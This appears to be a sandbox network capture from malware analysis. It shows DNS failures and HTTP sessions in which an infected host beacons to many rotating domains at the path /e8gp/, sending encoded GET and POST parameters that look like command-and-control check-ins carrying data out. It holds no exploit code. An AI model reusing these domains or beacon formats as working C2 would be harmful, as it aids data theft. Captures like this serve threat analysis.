Aug 23, 2023 14:56:02.993818998 CEST	4.2.2.1	192.168.0.56	0xbb5d	Server failure (2)	www.corkagenexus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:57:00.666049957 CEST	4.2.2.1	192.168.0.56	0x736f	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:57:00.666084051 CEST	4.2.2.1	192.168.0.56	0x736f	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:57:00.666100979 CEST	4.2.2.1	192.168.0.56	0x736f	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:57:00.666117907 CEST	4.2.2.1	192.168.0.56	0x736f	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:57:00.995655060 CEST	4.2.2.2	192.168.0.56	0x736f	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:57:00.995688915 CEST	4.2.2.2	192.168.0.56	0x736f	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2023 14:57:00.995706081 CEST	4.2.2.2	192.168.0.56	0x736f	Server failure (2)	www.cdf63.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.growind.info

www.qq9122.com

www.dalilamendezgallery.com

www.spv88.online

www.kuailesms.net

www.xc3e3.fun

www.mixova.art

www.skindocworld.com

www.greaterudition.com

www.brioche-amsterdam.com

www.gms-medika.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.0.56	49165	66.29.151.121	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:52:20.486977100 CEST	89	OUT	GET /e8gp/?xhc0L2=61qgLCVmwiYhY1k2gwUpsEeOxq+LhUlbpqnlW+J5fZEqilNytgGabqEunmU6yZQuNKMgwmW03tX/qZ3Mu/pSbEMh+Akeuw6b40Ne&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.growind.info Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:52:20.790690899 CEST	90	IN	HTTP/1.1 404 Not Found Date: Wed, 23 Aug 2023 12:52:20 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 31 20 32 38 38 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 34 35 2e 38 22 20 63 79 3d 22 38 36 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 35 20 32 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="445.8" cy="867.7" r="3.7" transform="translate(-346.5 298.5) rotate(-27.1)" style="fill: #ffe
Aug 23, 2023 14:52:20.790693998 CEST	92	IN	Data Raw: 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 30 2e 31 20 Data Ascii: 029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27.1)" style="fill: #ffe0
Aug 23, 2023 14:52:20.790695906 CEST	93	IN	Data Raw: 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 37 2e 39 22 20 Data Ascii: (-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(
Aug 23, 2023 14:52:20.790697098 CEST	94	IN	Data Raw: 30 34 2e 36 22 20 63 79 3d 22 38 30 32 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 30 2e 32 20 33 31 38 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 Data Ascii: 04.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="53
Aug 23, 2023 14:52:20.790698051 CEST	96	IN	Data Raw: 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 32 2e 35 22 20 63 79 3d 22 37 39 30 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e Data Ascii: 27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-2
Aug 23, 2023 14:52:20.790699959 CEST	97	IN	Data Raw: 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36 33 2e 34 20 33 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 Data Ascii: .7" transform="translate(-263.4 383) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="648" cy="747.5" r="3.7" transform="translate(-269.4 377.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="643.5" cy="727.1" r="3.7" t
Aug 23, 2023 14:52:20.791001081 CEST	98	IN	Data Raw: 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 39 37 2e 39 22 20 63 79 3d 22 37 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 39 Data Ascii: e029"/> <circle cx="597.9" cy="751.8" r="3.7" transform="translate(-276.9 355.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="594.7" cy="767.9" r="3.7" transform="translate(-284.6 355.4) rotate(-27.1)" style="fill: #ffe
Aug 23, 2023 14:52:20.791002989 CEST	100	IN	Data Raw: 73 6c 61 74 65 28 2d 32 35 35 2e 31 20 33 33 38 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 Data Ascii: slate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r="3.7" transform="translate(-247.3 336.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="559.1" cy="669.7" r="3.7" transform="trans
Aug 23, 2023 14:52:20.791323900 CEST	101	IN	Data Raw: 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 34 31 2e 31 22 20 63 79 3d 22 36 39 32 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 36 2e 34 20 33 32 32 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 Data Ascii: <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-256.4 322.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="556.3" cy="703.9" r="3.7" transform="translate(-259.7 330.9) rotate(-27.1)" style="fill: #ffe029"/> <
Aug 23, 2023 14:52:20.791325092 CEST	102	IN	Data Raw: 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 31 35 2e 32 22 20 63 79 3d 22 37 33 30 2e 35 22 20 72 3d 22 33 2e 37 22 Data Ascii: ate(-27.1)" style="fill: #ffe029"/> <circle cx="515.2" cy="730.5" r="3.7" transform="translate(-276.3 315.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="501" cy="717.2" r="3.7" transform="translate(-271.8 307.1) rotate
Aug 23, 2023 14:52:20.963891983 CEST	104	IN	Data Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 35 2e 31 20 33 30 32 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 Data Ascii: ="3.7" transform="translate(-235.1 302.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="494.3" cy="646.3" r="3.7" transform="translate(-240.2 296.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="478.7" cy="654.5" r=

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.0.56	49166	137.220.225.54	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:52:35.399111986 CEST	131	OUT	GET /e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvA9&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.qq9122.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:52:35.763166904 CEST	132	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.qq9122.com/e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvA9&HDp=njTTUjRhh2_ Date: Wed, 23 Aug 2023 12:52:35 GMT Content-Length: 191 Connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 71 71 39 31 32 32 2e 63 6f 6d 2f 65 38 67 70 2f 3f 78 68 63 30 4c 32 3d 47 36 47 6a 73 61 4e 44 74 56 35 6d 61 72 61 45 43 4d 53 58 55 6e 33 46 53 43 74 52 4b 56 31 59 70 34 47 58 4d 65 4c 78 42 64 53 36 38 58 46 4d 38 66 46 75 43 6f 61 56 6d 4b 4d 63 30 45 54 39 43 48 56 56 2f 4f 50 50 6b 48 74 33 4a 77 39 73 38 76 70 4a 41 53 71 71 4e 65 41 4d 71 74 50 77 76 76 41 39 26 61 6d 70 3b 48 44 70 3d 6e 6a 54 54 55 6a 52 68 68 32 5f 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.qq9122.com/e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvA9&HDp=njTTUjRhh2_">Moved Permanently</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.0.56	49175	34.102.136.180	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:54:55.545867920 CEST	154	OUT	GET /e8gp/?xhc0L2=jdN2yhs3x4p58YCD4U7n/gj8BurDXSdvL7HLiEUfYbhgZbFQI7BchpBTg2Lpqi+Gn9rfegZCc3gTj3ynTxQL940J2lKkq4WtWM4f&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.greaterudition.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:54:55.667485952 CEST	155	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 23 Aug 2023 12:54:55 GMT Content-Type: text/html Content-Length: 291 ETag: "64e2c541-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.0.56	49176	104.21.26.182	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:55:06.772650003 CEST	157	OUT	POST /e8gp/ HTTP/1.1 Host: www.brioche-amsterdam.com Connection: close Content-Length: 120 Cache-Control: no-cache Origin: http://www.brioche-amsterdam.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.brioche-amsterdam.com/e8gp/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 78 68 63 30 4c 32 3d 4e 5a 53 50 53 6c 37 6a 42 62 76 52 43 34 66 71 35 43 4b 53 73 76 43 77 33 66 61 71 64 51 65 6c 62 68 64 39 64 6b 36 30 68 73 4c 70 65 76 6b 6d 42 31 6f 7a 49 30 6f 75 65 2d 33 62 79 5f 65 6c 6f 66 4b 56 75 62 55 51 78 74 73 35 4e 4d 35 52 6a 47 70 50 77 51 4a 2d 59 58 6c 63 62 34 7a 77 4e 6e 73 37 4a 71 6d 65 55 32 42 32 77 41 29 2e 00 00 00 00 00 00 00 Data Ascii: xhc0L2=NZSPSl7jBbvRC4fq5CKSsvCw3faqdQelbhd9dk60hsLpevkmB1ozI0oue-3by_elofKVubUQxts5NM5RjGpPwQJ-YXlcb4zwNns7JqmeU2B2wA).

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.0.56	49177	104.21.26.182	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:55:06.782644987 CEST	157	OUT	GET /e8gp/?xhc0L2=Ab6vRTzAMfHQY4XdwhW7wtbhx8W7NHCMdlU0DyCHtsf2UMNfDFsTdFwISOrS2vaK2PSRorBz9aFTNso43ncynBJgfEZaaeKMLRlW&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.brioche-amsterdam.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:55:06.804220915 CEST	158	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 23 Aug 2023 12:55:06 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 23 Aug 2023 13:55:06 GMT Location: https://www.brioche-amsterdam.com/e8gp/?xhc0L2=Ab6vRTzAMfHQY4XdwhW7wtbhx8W7NHCMdlU0DyCHtsf2UMNfDFsTdFwISOrS2vaK2PSRorBz9aFTNso43ncynBJgfEZaaeKMLRlW&HDp=njTTUjRhh2_ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u9S6iVGwEVwCduL9ExybXuArHpbmHfmwOlI%2F%2B08n%2BNTdBiVc8dqoaRFGGRO4%2BMGsWiXFz3wJgQcJLMAhC%2Fn6N3QqfcKqwE2YueIBhfJiFIy5RyeoQXm0OwmTQZcbHsqK9q38JH421vLQpwvd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fb3820b695c3a7a-FRA alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.0.56	49178	172.67.200.50	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:55:16.851361036 CEST	160	OUT	POST /e8gp/ HTTP/1.1 Host: www.gms-medika.com Connection: close Content-Length: 120 Cache-Control: no-cache Origin: http://www.gms-medika.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.gms-medika.com/e8gp/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 78 68 63 30 4c 32 3d 6c 50 41 4a 76 52 51 42 6c 57 33 48 33 42 7e 33 74 72 32 33 6c 41 73 6b 49 41 4e 7a 74 72 33 70 7e 79 56 6c 7e 49 31 6d 36 6f 42 51 4c 5a 6f 68 59 42 48 37 72 32 52 38 75 4d 33 6e 33 68 64 64 50 56 70 6b 77 37 54 55 6c 4a 48 37 46 79 49 77 35 41 53 78 4f 6a 59 75 51 37 57 79 69 72 67 35 39 50 4c 6f 5a 74 64 55 4d 4a 59 6a 55 51 29 2e 00 00 00 00 00 00 00 Data Ascii: xhc0L2=lPAJvRQBlW3H3B~3tr23lAskIANztr3p~yVl~I1m6oBQLZohYBH7r2R8uM3n3hddPVpkw7TUlJH7FyIw5ASxOjYuQ7Wyirg59PLoZtdUMJYjUQ).

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.0.56	49179	172.67.200.50	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:55:16.860595942 CEST	160	OUT	GET /e8gp/?xhc0L2=oNopsgYov2zFzHOYq9j5/w4HKjdoqPfC5Sc2oZNy6d0vNaNSOmDp+kl5mvv/3C1TW3Bgx4jTjeuRFSZZthnMZyYwXoq0jNZF75DM&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.gms-medika.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:55:16.888818979 CEST	161	IN	HTTP/1.1 530 Date: Wed, 23 Aug 2023 12:55:16 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KKX9lMsfifLVyHi%2BIwmjISxfdZvFRKPeQyt0uHAF5eNn9vNv2Psl4CY8Is5PwZm2bv5KF9CiYRkbY6SISQScQvFs9eFjOxltwi9iexjW4PfgxOQkUAvNJJC2AT2HFgYlqM%2F1sTA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 7fb3824a6cf99b2d-FRA alt-svc: h3=":443"; ma=86400 Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 31 36 Data Ascii: error code: 1016

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.0.56	49180	66.29.151.121	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:55:37.109666109 CEST	162	OUT	GET /e8gp/?xhc0L2=61qgLCVmwiYhY1k2gwUpsEeOxq+LhUlbpqnlW+J5fZEqilNytgGabqEunmU6yZQuNKMgwmW03tX/qZ3Mu/pSbEMh+Akeuw6b40OS&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.growind.info Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:55:37.402868986 CEST	164	IN	HTTP/1.1 404 Not Found Date: Wed, 23 Aug 2023 12:55:37 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 